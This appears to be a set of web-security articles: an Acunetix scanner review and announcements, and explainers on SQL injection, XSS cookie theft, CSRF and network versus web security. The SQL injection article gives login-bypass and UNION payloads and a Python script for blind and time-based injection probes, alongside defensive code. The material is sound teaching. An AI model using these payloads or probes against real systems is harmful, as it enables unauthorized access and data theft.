Users are able to click on the High and Medium counts and be taken straight to the Vulnerabilities section for a detailed breakdown. They can click through to specific websites, vulnerability types, and active/waiting scans. It’s a fairly comprehensive overview, and it gets more interesting when you hit the show trends button.

Here, Acunetix gives some long-term metrics. Line graphs show the number of open vulnerabilities in a 12-month period, the average number of days to remediate issues, issues over time, and more.

acunetix enterprise attacks

However, though the dashboard presents a nice overview, core functionality is found under the Targets heading. Users are able to click the Add Target button and enter a website or application URL with a description for easy identification.

acunetix scan site setup

Acunetix then presents you with a number of options, separated into General, Crawl, HTTP, and Advanced tabs. The general tab lets you specify the business criticality of the target, which helps to prioritize the vulnerabilities it detects. You can also set the speed of the scan and choose to scan continuously to monitor the progress long-term. If a scan is taking too long, you can pause it and continue at a later date.

With advanced options, you can specify the languages to scan, add custom headers and cookies, and specify allowed hosts. There’s also the ability to import files for the crawler, such as URL lists and Fiddler Proxy Export. You can even craft custom scan types to look for recently disclosed vulnerabilities.

The same section also houses the site login option, which gives the app access to restricted areas for better scanning. In most cases, Acunetix can log in to the site automatically, but there’s also an option to record your login sequences via a dedicated sequence wizard.

acunetix enterprise site scan

It seems Acunetix has thought of pretty much everything here, and a scan of known test sites revealed many types of issues. It was adept at discovering several instances of cross-site scripting, as well as expression language injection and DOM-based XSS.

Importantly, though, it was also able to find issues that weren’t as critical. Medium severity issues such as Apache httpOnly cookie disclosure, HTML injection, vulnerable JavaScript libraries and more were all discovered. Acunetix has made several improvements to their scan times, and we found scans to take no more than 15 minutes even on large sites and with a slow connection.

acunetix enterprise vulnerability list

As mentioned earlier, you can drill down into specific vulnerabilities for more information. A page will give an explanation of the vulnerability, the details of the attack, HTTP requests, and impact. Critically, there’s also information about how to fix the issue, as well as a CWE link and CVSS information. Once reviewed, you can mark them as fixed, ignored, or false positive.

acunetix enterprise examining vulnerability

You’re also able to look at vulnerabilities from a site vulnerability perspective, looking at the status of individual files and the specific parameters within them.

AcuSensor – Achieving 100% High-Severity Vulnerability Accuracy

Despite all this, Acunetix emphasises that its users will get better results with the use of AcuSensor. The AcuSensor agent is available for installation on the website in PHP, .NET, and Java form, and improves the accuracy of the scan with better crawling and detection, as well as a decrease in false positives. The company promises 100% high-severity vulnerability accuracy and detection of a larger range of SQL injection issues.

acunetix enterprise how acusensor works

The tool also gives line-of-code information for PHP applications and stack traces for ASP.NET and Java, as well as example SQL queries for injections. This makes it a very powerful offering, though it isn’t recommended for production environments.

Via a Jenkins plugin, the Enterprise variant can also be implemented in continuous integration processes. Jenkins can automatically trigger scans and reports with each build, creating both PDF Acunetix versions and an HTML Jenkins one. It can also fail builds if a certain threat level is reached. There’s a REST API for other integrations, with up-to-the-minute status of ongoing scans, vulnerability details, and more.

Acunetix Reporting, Exporting, and Issue Tracking

Once a scan is complete, users have several options of how to proceed. A strong point of Acunetix is its support for a number of Web Application Firewalls. The software’s WAF Export option supports a number of major solutions, including F5, Imperva, and Fortinet. For others, there’s the choice to export as a regular XML, but that’s only available if you export a full scan. For specific vulnerabilities, you’ll have to use one of the other formats.

acunetix enterprise reporting

Perhaps more useful is the ability to send vulnerabilities to an issue tracker, though it does have to be configured first. After finding the option, you add GitHub login details and select the relevant project. There’s the option to specify an issue type, as well as validate the connection before exiting.

You then have to set up the tracker for every site by heading back to the Targets menu and changing the advanced option. It’s a little clunky to add the option retroactively, but it gets the job done.

acunetix enterprise reporting

In Firewall.cx’s testing, the issues pushed to GitHub near-instantly, with relevant labels and all of the information provided. That includes the target URL, severity, attack details, HTTP requests, impact, remediation suggestions, and references. It all works with a single button press and we have no doubt this will greatly speed up workflows.

Similar functionality exists for JIRA and Microsoft TFS, though JIRA currently has a limit of 20 issue tracker items. It’s generally smart during the process, refusing to open duplicate issues for the most part.

Overall, the issue tracker capabilities are quite impressive and intuitive, but there are options for traditional reporting if your organization requires it. There are a number of standard templates, but also a total of ten different compliance templates, which is extremely useful.

acunetix enterprise compliance reporting templates

Reports are available in PDF or HTML for CWE 2011, HIPAA, ISO 27001, OWASP, and more. Each starts with an explanation and continues with a category-by-category breakdown with the number of alerts and information about each.

acunetix enterprise reporting

There’s no real room for customisation here, but there’s little need for it. Everything you’d expect is covered, and displayed in a logical, if not particularly pretty way. Reports generate quickly in the background and can be produced on a per-scan, per-target, or bulk basis.

Conclusion

Firewall.cx’s journey with Acunetix began almost 12 years ago with its standalone Windows 98 program. The distance the web vulnerability scanner has come since then is truly immeasurable, managing to keep up with the competition as other companies have faded into the background.

The product sports a minimal and modern UI, but its results aren’t to be scoffed at, being the only one to net out-of-band vulnerabilities. Its long time in the industry has allowed it to think of pretty much everything, with no major drawbacks to speak of and new integrations in the works. Though report design is average, the number of templates is higher than usual, and many will lean on its issue tracker support.

Thanks to Acunetix Enterprise v12, organizations are now able to scan in-house, third-party and cloud-based web applications or websites for security vulnerabilities such as SQL injections, Cross-Site Scripting attacks and hundreds of other security flaws, and take corrective action. Developers can automate vulnerability assessments in their processes, achieve 100% high-severity vulnerability accuracy thanks to AcuSensor, and detect a larger range of SQL injection issues. Compliance reports can be generated to suit CWE 2011, HIPAA, ISO 27001, OWASP standards and much more.

Despite this significant feature set, it remains affordable to all organizations and is well worth looking into. An Enterprise Plus plan is also available, offering over 20 targets at a variable price.


Acunetix v12: More Comprehensive, More Accurate and now 2X Faster Web Vulnerability Scanner

22nd May 2018: Acunetix, the pioneer in automated web application security software, has announced the release of version 12. This new version provides support for JavaScript ES7 to better analyse sites which rely heavily on JavaScript, such as SPAs. This, coupled with a new AcuSensor for Java web applications, sets Acunetix ahead of the curve in its ability to comprehensively and accurately scan all types of websites. With v12 also comes a brand new scanning engine, re-engineered and re-written from the ground up, making Acunetix the fastest scanning engine in the industry.

“Acunetix was always in the forefront when it came to accuracy and speed, however now with the re-engineered scanning engine and sensors that support the latest JavaScript and Java technologies, we are seeing websites scanned up to 2x faster without any compromise on accuracy.” announced Nicholas Sciberras, CTO.

A free trial version can be downloaded from: http://www.acunetix.com/vulnerability-scanner/download/

Support For Latest JavaScript

Acunetix DeepScan and the Acunetix Login Sequence Recorder have been updated to support ECMAScript version 6 (ES6) and ECMAScript version 7 (ES7). This allows Acunetix to better analyse JavaScript-rich sites which make use of the latest JavaScript features. The modularity of the new Acunetix architecture also makes it much easier now for the technology to stay ahead of the industry curve.

AcuSensor For Java

Acunetix version 12 includes a new AcuSensor for Java web applications. This improves the coverage of the web site and the detection of web vulnerabilities, decreases false positives and provides more information on the vulnerabilities identified. While already supporting PHP and ASP .NET, the introduction of Java support in AcuSensor means that Acunetix coverage for interactive gray box scanning of web applications is now possibly the widest in the industry.

acunetix web vulnerability scanner v12 AcuSensor for Java

Speed & Efficiency With Multi-Engine

Combining the fastest scanning engine with the ability to scan multiple sites at a time, in a multi-engine environment, allows users to scan thousands of sites in the least time possible. The Acunetix Multi-engine setup is suitable for Enterprise customers who need to scan more than 10 websites or web applications at the same time. This can be achieved by installing one Main Installation and multiple Scanning Engines, all managed from a central console.

Pause / Resume Feature

Acunetix Version 12 allows the user to pause a scan and resume it at a later stage. Acunetix will proceed with the scan from where it had left off. There is no need to save any scan state files or similar - the information about the paused scan is automatically retained in Acunetix.

acunetix web vulnerability scanner paused scan

About Acunetix

User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript and AJAX-heavy websites, allowing auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and an on-premise solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritise and control vulnerability threats – ordered by business criticality.

Acunetix, The Company

Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader, and a pioneer in automated web application security technology. Acunetix products and technologies are depended on globally by individual pen-testers and consultants all the way to large organizations. It is the tool of choice for many customers in the Government, Military, Educational, Telecommunications, Banking, Finance, and E-Commerce sectors, including many Fortune 500 companies, such as the Pentagon, Nike, Disney, Adobe  and many more.


Everything You Need to Know About SQL Injection Attacks & Types, SQLi Code Example, Variations, Vulnerabilities & More

SQL Injection Attacks are one of the most popular attacks against web servers, websites and web applications. A fairly popular website can expect to receive anywhere between 80 and 250 SQL injection attacks on a daily basis and these figures can easily reach thousands when an SQL vulnerability is disclosed to the public.

This article aims to help network engineers, administrators, security experts and IT professionals understand what an SQL injection is by taking you step-by-step on how an HTTP SQL injection attack is executed using real code. 


SQL Injection Attacks - Basics

SQL Injection, or SQLi for short, refers to an attack vector that exploits a web application by abusing the inherent trust between the web application and the database. An SQL injection attack would allow an attacker to perform malicious actions on the database through the use of specially crafted SQL commands. SQL is the most commonly used database query language, making it ideal for an attacker to target.

Since SQL Injection attacks can be performed against a wide array of applications, this attack vector is one of the most common and most critical web vulnerabilities. So much so that injection attacks, such as SQL Injection, have placed first in OWASP’s Top 10 list several times in a row.

SQL Injection attacks can allow an attacker to extract, modify, add and delete data from a database, in turn affecting data confidentiality, integrity and availability (since an attacker could potentially delete data and disrupt operations). In addition, an SQL Injection attack can be used as a springboard to escalate the attack.

Example of an SQL Injection Vulnerability

A web application would typically communicate with a variety of back-end systems, including a database. Let’s take an HTML form, which inserts values into a database, as an example.

Once the form is filled out and submitted, an HTTP request (usually a POST request) is sent to the web application, where the input values are directly included in the SQL statement that will insert these values into the database.

An SQL Injection vulnerability occurs when the web application trusts the user’s input and concatenates it directly into the SQL statement, instead of parameterizing it using prepared statements. Prepared statements instruct the database which part of the query is the command to be executed and which part is to be treated purely as the user’s input.

Because the database then never interprets characters in the user’s input as part of the SQL statement itself, prepared statements prevent an attacker from injecting their own SQL statements.

SQL Injection example: The following pseudo code is a simple example showing how a user can be authenticated:

// Get username and password from POST request
username = request.post['username']
password = request.post['password']

// Statement vulnerable to SQL injection
sql = "SELECT id FROM users WHERE username='" + username + "' AND password='" + password + "'"

// SQL statement executed by database
db.exec(sql)

If the user inputs foo as the username and bar as the password, the following SQL statement will be processed by the database server:

SELECT id FROM users WHERE username='foo' AND password='bar'

When executed, as expected, this will return the value of the ID column that is associated with the database entry of the corresponding username and password.
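
For contrast, the same lookup can be written with a parameterized query so that the input is always treated as data, never as SQL. The following is a minimal sketch using Python's standard sqlite3 module; the table layout and the function wrapper mirror the pseudo code above and are assumptions for illustration only.

import sqlite3

def authenticate(db_path, username, password):
    """Return the user id (or None) using a parameterized query.

    The '?' placeholders guarantee that username and password are bound
    as data, so input such as  pass' OR 1=1  cannot change the structure
    of the SQL statement.
    """
    conn = sqlite3.connect(db_path)
    try:
        cur = conn.execute(
            "SELECT id FROM users WHERE username = ? AND password = ?",
            (username, password),
        )
        row = cur.fetchone()
        return row[0] if row else None
    finally:
        conn.close()

In a real application the password would also be hashed before comparison; the sketch only addresses the injection issue.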

Exploiting SQL Injection Vulnerabilities 

The example above is vulnerable to SQL Injection, since whatever the user inputs in the form will be interpreted by the database server as part of the command. For instance, an attacker could bypass this form by entering foo as the username and pass' OR 1=1 as the password.

The following is what the SQL statement would look like.

SELECT id FROM users WHERE username='foo' AND password='pass' OR 1=1

From the above statement we can see that the user’s input has changed the statement’s functionality: the value of the id column is now returned if the submitted username is foo and the password is pass, or if 1 is equal to 1 (which is always the case).

Because AND binds more tightly than OR, the 1=1 condition satisfies the WHERE clause on its own for every row in the table, so the attacker does not even need a valid username or password for the query to return user ids. With this trick, the attacker can bypass the website’s authentication mechanism.

To gain even more control over the SQL statement, an attacker can comment out the remainder of it using the double-dash (--) notation:

SELECT id FROM users WHERE username='username' --' AND password='bar'

Everything after the double-dash is treated as a comment and is therefore not considered during execution. This will once again allow an attacker to bypass authentication.

Variations of SQL Injection Attacks

It is important to note that there are three major classifications of SQL Injection attacks, each with its own particular use and each applicable only under specific circumstances. These categories, described below, are In-Band, Blind (Inferential) and Out-of-Band SQL Injection.

In-Band SQL Injection

The example that we saw earlier was an in-band attack since the same channel was used to launch the attack and obtain the result which, in this case, was being authenticated. In-band attacks are the most common and easiest to exploit in comparison to other SQL injection attacks. 

Data exfiltration in in-band attacks is done either through database error messages that the web application reports when the injected SQL fails, or through the UNION operator, which allows an attacker to append the results of their own SELECT statement to those of the legitimate query.
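
As a hedged illustration of the UNION technique, the short sketch below simply prints the statement that the vulnerable string concatenation from the earlier pseudo code would end up executing if an attacker supplied a UNION payload as the username; the admin account and the selected column are hypothetical.

# Hypothetical illustration: how a UNION payload changes the query built
# by the vulnerable string concatenation shown earlier in this article.
malicious_username = "foo' UNION SELECT password FROM users WHERE username='admin' --"
password = "irrelevant"

sql = ("SELECT id FROM users WHERE username='" + malicious_username +
       "' AND password='" + password + "'")
print(sql)
# -> SELECT id FROM users WHERE username='foo' UNION SELECT password FROM users WHERE username='admin' --' AND password='irrelevant'
# The UNION-ed row (the admin password) comes back through the same channel
# the application already uses, which is what makes this an in-band attack.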

Blind SQL Injection

Blind or Inferential SQL Injection attacks may take longer to execute, since the only response returned is in the form of a boolean. The attacker can exploit this to make requests and identify differences in the response being returned, which will confirm if the requests sent had a true or false result and then reconstruct the database structure and data.

Content based attacks focus on the response being returned, such as an HTTP response status code or the response data itself. On the other hand, time based attacks measure delays in the response being sent by the server where, for example, a ten second delay may confirm that the request returned a true result, while no delay means that the result was false. 
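
The following is a minimal sketch of the boolean-based and time-based probes described above, written in Python with the third-party requests library; the target URL, the cat parameter and the MySQL SLEEP() payload are illustrative assumptions, not a real or recommended target.

import time
import requests  # third-party: pip install requests

TARGET = "http://testphp.example/listproducts.php"  # hypothetical vulnerable page

def probe(payload):
    """Send one crafted value for the hypothetical 'cat' parameter and time the response."""
    start = time.monotonic()
    resp = requests.get(TARGET, params={"cat": payload}, timeout=15)
    return resp.text, time.monotonic() - start

# Boolean-based probe: a TRUE and a FALSE condition should produce visibly
# different pages if the parameter is injectable.
body_true, _ = probe("1 AND 1=1")
body_false, _ = probe("1 AND 1=2")
print("boolean-based indicator:", body_true != body_false)

# Time-based probe: if the injected SLEEP(5) runs (MySQL syntax assumed),
# the response arrives noticeably later, suggesting a TRUE result.
_, delay = probe("1 AND SLEEP(5)")
print("time-based indicator:", delay > 4)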

Out-of-Band SQL Injection

Out-of-Band attacks are the least common of the SQLi attacks and generally the most difficult to execute because the attack requires that the server hosting the database will communicate with the attacker’s infrastructure. This attack would normally be used if the channel through which the requests are being made is not consistent or stable enough for an in-band or blind SQLi attack to succeed. 

Summary

SQL Injection attacks require that the web application passes an attacker’s input to the database without making use of prepared SQL statements. Exploiting an SQL Injection vulnerability can, potentially, even allow an attacker to gain access to resources that are only reachable on local networks.

SQL Injection has been around since 1998, so it is widely understood and easily exploitable using free and readily available tools. Most development frameworks have protection mechanisms built in that assist web developers to produce web applications that are not prone to SQL Injection attacks.

This goes to show that preventing SQL Injection vulnerabilities has become a necessity. Manually testing each form and parameter does not work well, which is why it makes sense to automate web application security testing with a tool such as Acunetix, which will not only find instances of SQL Injection but also other known vulnerabilities.

Acunetix Online: Run a Free Scan for Network and Web Vulnerabilities. Detect, Prioritise and Manage Security Threats

Acunetix has refreshed its online web and network vulnerability scanner, Acunetix Online, with a massive update. The new Acunetix Online now incorporates all the features found in its on-premise offering, Acunetix On Premise. With a brand new, simpler-than-ever user interface, integrated vulnerability management and integration with popular Web Application Firewalls (WAFs) and issue tracking systems, this is by far the biggest Acunetix Online release since its introduction.

Simpler, Cleaner User Interface

Acunetix Online’s new user interface has been re-designed from the ground up to bring it in line with Acunetix On Premise. The interface has been simplified and made more useful by focusing on the product’s core functionality, introducing filtering options and improving the manageability of Targets. Features include:

  • Targets, Scans, Vulnerabilities and Reports can all be filtered to find exactly what you are looking for quickly.
  • Excluded Hours, Excluded Paths, custom User Agent strings, client certificates and many more configuration options previously only available to Acunetix On Premise customers are now also available in Acunetix Online.
  • Test complex web applications by pre-seeding crawls using a list of URLs, Acunetix Sniffer Log, Fiddler SAZ files, Burp Suite saved and state files, and HTTP Archive (HAR) files.
  • Vulnerabilities across all Targets are displayed in one view.
  • Vulnerabilities can be filtered by Target, Business Criticality, Vulnerability, Vulnerability Status and CVSS score.
  • Vulnerabilities can be grouped by Target Business Criticality and Vulnerability Severity.

The enhanced Acunetix Online Dashboard provides all the necessary information in one place to help manage and track security vulnerabilities.

Easier, more effective Target and Vulnerability management

Business Criticality, a user-defined metric to determine how important a Target is to the business’ function, can now be assigned to Targets. This enables you to easily prioritize vulnerability remediation based on business criticality.

Out-of-the-box Issue Tracker and WAF integration simplifies vulnerability remediation

Acunetix Online now supports one-click issue creation in Atlassian JIRA, GitHub and Microsoft Team Foundation Server (TFS), allowing development teams to better keep track of vulnerabilities in their issue tracking systems -- all without leaving the Acunetix Online interface!

Vulnerabilities can now be exported to WAFs (F5 Big-IP ASM, Fortinet FortiWeb and Imperva SecureSphere), allowing users to implement virtual patches to critical vulnerabilities in the WAF, until a fix addressing the vulnerability is deployed to the web application. Scan results can now also be exported to the Acunetix generic XML for integration with other WAFs or 3rd party systems.

Mark Vulnerabilities As Fixed Or False Positives

Acunetix Online now provides the ability to mark vulnerabilities as False Positive, Fixed or Ignored. This means that users can now get rid of false positives from upcoming scans and reports.

To make vulnerability management more useful, Acunetix Online will now label recurring vulnerabilities as Rediscovered. You may choose to accept a vulnerability’s risk by marking the vulnerability as Ignored.

Custom Scan Types

Scan Types are a logical grouping of tests that check for specific classes of vulnerabilities. Acunetix Online comes bundled with commonly used default Scan Types; however, it now also lets you create your own Scan Types. A great example of a custom Scan Type is one that scans Targets for a recently discovered vulnerability.

Enhanced Reporting

In addition to generating reports for an individual scan, Acunetix Online now allows you to generate reports on:

  • Individual or multiple Scans
  • Individual or multiple Targets
  • Individual, multiple or all the Vulnerabilities identified by Acunetix.

There is also the introduction of a Scan Comparison report, which highlights the differences between two scans, allowing the user to easily identify new vulnerabilities in the latest scan, or vulnerabilities that are no longer detected, which could mean that they have been fixed. Reports are now available in both PDF and HTML.

Network Security Scanning

Acunetix Online provides a comprehensive perimeter network security scanning service by integrating with the latest OpenVAS network vulnerability scanning engine (v9). This means that Acunetix Online can now detect in excess of 50,000 perimeter network vulnerabilities.

Added Functionality For Acunetix Integrators

Acunetix Online now also has a new powerful RESTful API that may be used by system integrators. The API is able to provide up-to-the-minute status of on-going scans together with information on vulnerabilities identified for these scans.

 

Protecting Your Cookies from Cross Site Scripting (XSS) Vulnerabilities – How XSS Works

Understanding XSS Vulnerability Attacks

This article aims to help you understand how Cross Site Scripting (XSS) attacks work. Cross Site Scripting, or XSS, can happen in many ways. For example, an attacker may present you with a malicious website that looks like the original and ask you to fill in your credentials. When your browser sends its cookies over to the malicious website, the attacker decodes your information and uses it to impersonate you at the original site. This is a targeted attack and is called non-persistent in technical terms.

Websites and web applications usually send a cookie to identify a user after he/she has logged in. For every action from the user on the site, the user's browser has to resend the cookie to the web application as identification. If an attacker is able to inject a Cross-site Scripting (XSS) payload on the web application, the malicious script could steal the user's cookie and send it to the attacker. The attacker can then use the cookie to impersonate the user in the web application. The most dangerous variation of XSS is persistent, or stored XSS. This is because the attacker’s XSS payload gets stored and served to each visitor accessing the website or web application without any user interaction.

By stealing a session cookie, an attacker can get full control over the user's web application session.

What Happens During An XSS Attack?

Although Cross-site Scripting (XSS) is one of the most common forms of attack, most people underestimate its power. In an XSS attack, the attacker targets the scripts executed on the client side rather than on the server side; it is mostly client-side technologies such as JavaScript and HTML whose weaknesses are exploited in these attacks.

In an XSS attack, the attacker manipulates the client-side scripts of a web application so that they execute in a manner of the attacker's choosing. With such a manipulation, the attacker can embed a script within a page so that it executes each time the page is loaded or whenever a certain associated event is performed.

Basic XSS attack: how malicious scripts are injected into web servers and victims' browsers

In another variation of the XSS attack, the attacker has infected a legitimate web page with a malicious client-side script. When the user opens the web page in his browser, the script downloads and, from then on, executes whenever the user opens that specific page.

As an example of an XSS attack, a malicious user injects their script into a legitimate shopping site URL. This URL redirects a genuine user to an identical but fake site. The page on the fake site runs a script to capture the cookie of the genuine user who has landed on the page. Using the cookie the malicious user now hijacks the genuine user's session.

Most site owners do not consider XSS attacks serious because, unlike attacks against back-end databases, they do not directly steal sensitive data; however, the consequences of an XSS attack against a web application can be quite serious, and both application functionality and business operations may be seriously compromised.

If an enterprise's site is vulnerable to XSS exploits, present and future customers may not want to continue to do business with it, fearing leakage of sensitive information. The loss of trust will definitely not augur well for the future of the enterprise. It might also lead to a defaced application and a public embarrassment for the enterprise, much to the relish of the attacker.

Exploitation through XSS may lead to the following:

  • Theft of identity;
  • Accessing of restricted or sensitive information;
  • Free access to otherwise paid-for content;
  • Spying on the habits of the user;
  • Changing the functionality of the browser;
  • Public defamation of an enterprise or an individual;
  • Defacement of a web application;
  • Denial of Service to genuine users.

In several cases of XSS attacks, malicious attackers have made use of security flaws in high-profile web sites and obtained user information and credit card details to carry out expensive transactions. They have tricked legitimate users into visiting a malicious but legitimate looking page that captured the user’s credentials and sent the details to the attacker.

Although the above incidents may not be as bad as that of attackers gaining access to an enterprise database, customers can easily lose faith in the application's security. For the owner of the vulnerable website, such incidents can turn into legal hassles, liabilities, and loss of business.

Protecting Your Cookies From XSS Vulnerabilities

There is not much one can do about a targeted or non-persistent attack where the user has delivered his/her credentials to the attacker. However, web application owners can use automated tools to check whether their applications are vulnerable to Cross-site Scripting.

The complex nature of web applications in present use makes it difficult to identify and check all attack surfaces manually against XSS attack variants, because the variants can take multiple forms. Therefore, automated web application security scanners are preferable as they can crawl the website automatically and check for any vulnerability to cross-site scripting. They detect and indicate the existing vulnerability of the URL and input parameters on the script of the website, which the owner of the website must then fix.
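
Beyond scanning, one complementary safeguard, not covered in the text above and offered here only as a hedged illustration, is to mark the session cookie HttpOnly (and Secure) when it is issued, so that a script injected through XSS cannot read it via document.cookie. A minimal sketch using Python's standard http.cookies module (the session value is made up):

from http.cookies import SimpleCookie

# Build a Set-Cookie header for a session identifier. With HttpOnly set,
# document.cookie in the browser will not expose the value to injected
# scripts; Secure restricts the cookie to HTTPS.
cookie = SimpleCookie()
cookie["session_id"] = "d41d8cd98f00b204e9800998ecf8427e"  # made-up value
cookie["session_id"]["httponly"] = True
cookie["session_id"]["secure"] = True
cookie["session_id"]["path"] = "/"

# Prints a Set-Cookie header carrying the HttpOnly, Secure and Path attributes.
print(cookie.output())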

Understanding, Avoiding & Protecting Against Cross Site Request Forgery Attacks

This article explains what a web browser cookie is and examines how Cross Site Request Forgery works by allowing hackers to intercept and abuse web browser cookies from unaware users trying to log on to a website to continue their online shopping or access personal online files (e.g. Dropbox). We also explain how to avoid Cross Site Request Forgery attacks and the best security practices to keep our web applications and users safer.

What is a Cookie?

When visiting a website, a cookie (small file) from the website is usually stored on your computer containing information such as login details, items you had in your shopping basket etc. Each cookie is unique to your web browser and website visited, so that the website can retrieve or read the contents of its cookie when revisiting it. What most people are unaware of is that any malicious attacker with access to your computer can use the cookies stored therein to exploit access to websites you have visited earlier.

A malicious attacker may take advantage of this situation by latching on to the authentication cookie the user is sending to the website for initiating an action and then using the credentials to impersonate the user. The attacker uses Cross Site Request Forgery (CSRF) for initiating the attack.

Mechanism of a CSRF Attack

The Open Web Application Security Project (OWASP) Top 10 lists Cross Site Request Forgery (CSRF), an attack whereby an attacker uses his or her website to send malicious code to a vulnerable web application in which a user is already authenticated.

Figure 1. Illustration of how CSRF attacks work

When the user visits the attacker’s website, the malicious code inadvertently forces the user’s browser to generate an unwanted request to the intended web application, thereby also making it send an authentication cookie. That allows the attacker to gain access to the functionality of the target web application just as the user would. Targets include web interfaces for network devices, in-browser email clients, and web applications such as social media sites.

Examples of CSRF attacks include the attacker transferring unauthorized money from victims’ bank accounts, sending out offensive postings on social media sites by impersonating you, and snooping on all your Internet traffic by redirecting your router (analyzed below). The attacker does all this from a site different from the vulnerable site, hence the name Cross Site.

Executing A CSRF Attack

Assume you have recently purchased a home wireless router and are trying to configure it via its web interface. As with most routers, it has a commonly used internal IP address of 192.168.1.1. Since it is difficult to configure, you seek help from a website that has published a guide showing the necessary buttons to click on the router interface to get everything set up securely.

The website guide actually belongs to attackers and they have a CSRF attack set up in the tutorial. They know that when clicking through their guide, you are also logged in to your router, following their instructions. The CSRF attack reconfigures your router without your knowledge so that all internet traffic would be routed to a proxy server they have set up on the internet, allowing them to monitor your internet activity.

Preventing CSRF Vulnerabilities

To prevent CSRF vulnerabilities, it must be clear that the vulnerability actually lies in the affected web application and not in the victim’s browser or the site hosting the CSRF. Therefore, web applications need countermeasures that raise the bar and make CSRF attacks more difficult to perform.

  1. Use HTTP POST (rather than GET) for requests that produce side effects such as deletions or data modifications. However, HTTP POST alone may not suffice, since an attacker can still create a phantom POST request using JavaScript once a page is loaded. The following additional safeguards help avoid CSRF for POST requests:
  2. Check the HTTP Referer header to verify that the request originated from the expected page and not from a malicious site. Of course, it is also possible for someone to inject HTML/JavaScript code into your page to originate the request. An alternative is to check the Origin header, which browsers send with POST requests and which contains only the scheme and hostname, thereby preserving privacy.
  3. Use one-time tokens. This is a popular method used by banks. The token is generated from a small electronic device for a single session of the user and included in each transmission. Forms contain a field that is populated by the token similar to the one shown below:

    Figure 2. Security tokens used for e-banking

  4. Use a double-submitted cookie. This is a variation of the one-time token, where the token submitted with the form is matched against a cookie instead of the session value (a minimal token-handling sketch follows after this list).
  5. Use a web application security scanner: you can also use an automated web application security scanner to automatically detect CSRF vulnerabilities in web applications. If you use Netsparker Desktop you do not need to disable the one-time token anti-CSRF technology to automatically scan your website.
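
For the token-based defences in items 3 and 4, the following is a minimal sketch of the synchronizer-token idea using only the Python standard library; the session dictionary and the form handling are simplified assumptions rather than a specific framework's API.

import hmac
import secrets

def issue_csrf_token(session):
    """Generate a per-session anti-CSRF token and remember it server-side."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token  # embed this value in a hidden form field

def verify_csrf_token(session, submitted_token):
    """Accept the request only if the submitted token matches the stored one."""
    expected = session.get("csrf_token", "")
    # compare_digest avoids timing side channels when comparing secrets
    return bool(expected) and hmac.compare_digest(expected, submitted_token or "")

# Simplified usage: 'session' stands in for real server-side session storage.
session = {}
form_token = issue_csrf_token(session)          # rendered into the HTML form
print(verify_csrf_token(session, form_token))   # True  -> legitimate submission
print(verify_csrf_token(session, "forged"))     # False -> request is refused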

Although the above suggestions will reduce the risk dramatically, they are no match for advanced CSRF attacks. Using unique tokens and eliminating all XSS vulnerabilities in web applications are still the strongest techniques against such CSRF attacks.

Differences between Network & Web Application Security. Comparing Network Security with Web Security

According to Wikipedia, security is defined as the degree of resistance to, or protection from, harm. It applies to any vulnerable and valuable asset, which in almost all cases includes an organization’s website, web services and IT infrastructure.

At the same time, it is important to realize that security is a very broad term. Many people mistakenly associate network security with web application security. While there are some similarities, there are also many distinct differences that necessitate a unique approach to each. The assumption that a secure network results in a secure web application and vice versa is a critical mistake.

In this article, we are going to look at what makes web application security different from network security and why an approach that addresses both is the only way forward when it comes to maintaining an effective overall IT security posture.

What Is Network Security?

Network security can be either hardware based (routers with built-in firewalls, network intrusion detection and prevention systems) or software based. Because network security has been around for a very long time, it’s often the first thing that comes to mind when people think about security. Web application security, on the other hand, is a relatively new challenge.

Much like a moat, curtain wall and portcullis protect a castle, network security plays the important but restrictive and limited role of keeping the bad guys (hackers) out and allowing the “good guys” to enter. In the DMZ environment there’s an overall focus on protecting the perimeter that surrounds the website, web application or web service with the help of a Firewall security appliance. Although this works well in some instances, Firewall security appliances are no longer considered an adequate solution because they are unable to protect organizations from their own vulnerable web services or web application servers.

Even with an Intrusion Prevention System (IPS) in place, new application-based exploits or incorrectly secured web applications are almost impossible to detect, because IPS systems are signature-based, which means they need to know about a specific exploit or attack in order to help protect against it.

Let’s examine two very common scenarios based in the organization’s DMZ environment, which is where most internet-originating attacks are focused:

First, when is network security considered effective? As an example, an FTP server might have network security settings that limit access to a specific remote user. This effectively controls who is able to access the server; however, we must keep in mind that the FTP server itself is responsible for filtering all requests from non-allowed users.

Second, if you have a high-traffic website or web application open to the public, port 80 (HTTP) and/or port 443 (HTTPS) usually need to be open, allowing both valid and malicious traffic to access the resource. The only way to effectively address this issue is through web application security, eliminating all potential web application vulnerabilities. Our article covering popular websites that have been repeatedly compromised provides direct proof of such real-life examples.

Web Application Security

Consumers’ need for applications that provide more information and increased functionality has organizations creating increasingly complicated web applications. As a result, the attack surface of many web applications is rarely static. It is either increasing in size or becoming more complicated. The process of managing web application security is a challenging one that is continuously becoming more time-consuming and demanding as applications continue to become more complex.

There are two distinct aspects that make web application security such a challenge:

  1. The organization’s network infrastructure provides access to the web application; by default, this exposes all potential vulnerabilities to attack, including web forms, input fields, logical web vulnerabilities and more. The only realistic solution is to work towards the elimination of all vulnerabilities.
  2. The second problem is that, from a network perspective, it is very difficult to differentiate hackers from legitimate traffic, even with the help of a sophisticated firewall security appliance.

The problem is further complicated by the fact that many malicious activities including the exploitation of vulnerabilities such as SQL Injection and DOM based Cross-Site Scripting vulnerabilities present themselves as regular traffic passing through port 80 or 443. Therefore the only way to resolve this problem is to place a greater emphasis on eliminating all web application vulnerabilities.

Summary

Every organization will have an individualized approach to security. The ideal approach takes into account both networks and web applications. Historically, a greater emphasis has been placed on network security, and this is an approach that has worked well.

However, as the trend towards depending more on increasingly complicated web applications and improved access to information continues, it has become critically important to manage all aspects of security — reducing overall risk to the greatest extent possible.

Obviously, this involves monitoring and controlling network traffic but it also includes the adoption of secure coding practices, scanning web applications for all potential vulnerabilities and using manual penetration testers who are experienced enough to identify and test for logical vulnerabilities.

Scan and Generate Firewall Rules to Secure your Website and WebServer with ModSecurity. Block Exploits & Vulnerability Attacks

ModSecurity is a very popular open-source web application firewall used to protect webservers and websites from vulnerability attacks, exploits, unauthorized access and much more. In this article, we’ll show you how web vulnerability scanners can be used to automatically generate the necessary rules that block all vulnerabilities identified during the scan.

